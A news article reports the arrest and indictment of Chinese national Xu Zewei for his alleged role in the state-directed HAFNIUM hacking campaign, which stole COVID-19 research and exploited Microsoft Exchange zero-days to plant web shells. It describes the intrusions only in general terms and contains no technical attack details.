Chinese Cybercriminals Target Microsoft Exchange Servers to Steal Vital COVID-19 Research Data

Houston, July 9, 2025 — In a landmark operation, the U.S. Justice Department announced the arrest of Xu Zewei, a 33-year-old Chinese national and alleged cybercriminal mastermind behind the infamous “HAFNIUM” hacking campaign.

Xu, detained in Milan, Italy on July 3 at the US’s behest, is accused of orchestrating a global cyber-espionage campaign directed by China’s Ministry of State Security (MSS).

The Southern District of Texas has unsealed a nine-count indictment against Xu and his co-defendant Zhang Yu, 44, who remains at large.

State-Backed Cyber Intrusions Amid Global Pandemic

According to court documents, Xu was an operative for Shanghai Powerock Network Co. Ltd., one of many technology companies contracted by the MSS’s Shanghai State Security Bureau (SSSB) to execute hacking assignments.

Xu and his team reportedly began targeting US universities, immunologists, and virologists in early 2020, just as the COVID-19 pandemic began to devastate the globe.

The hackers infiltrated research institutions for cutting-edge vaccine, treatment, and testing data.

Reports indicate that Xu kept MSS officers informed at every stage, confirming, for example, his breach of a Texas research university’s network on February 19, 2020.

Under MSS direction, he accessed the mailboxes of prominent virologists to exfiltrate sensitive COVID-19 research, potentially undermining global public health responses.

HAFNIUM and the Exploitation of Microsoft Exchange Vulnerabilities

In late 2020 and early 2021, Xu and his co-conspirators pivoted to exploiting zero-day vulnerabilities in Microsoft Exchange Server, software used by thousands of organizations worldwide for email and data storage.

This allowed the group, known publicly as “HAFNIUM,” to compromise over 60,000 US entities and directly victimize more than 12,700 organizations before Microsoft publicly disclosed the vulnerabilities in March 2021.

The attackers installed custom “web shells” to maintain remote access, allowing them to search internal emails for information related to COVID-19, US policymakers, and Chinese intelligence interests.

Victims included another Texas university and a major international law firm. Even after the public disclosure and release of security patches, hundreds of organizations remained exposed until the FBI and private cybersecurity firms intervened.

Broader Implications and Ongoing Pursuit

Authorities warn that the PRC’s decentralized approach, which utilizes private contractors for state-sponsored hacking, has created collateral damage, leaving global systems vulnerable to further exploitation and facilitating a black market for stolen information.

Xu faces multiple felony charges, with maximum sentences ranging from two to twenty years.

Zhang Yu is still at large; the FBI urges anyone with relevant information to call 1-800-CALL-FBI.

The extradition process for Xu is now underway, as the US intensifies efforts to combat state-sponsored cybercrime. All defendants are presumed innocent unless proven guilty in court.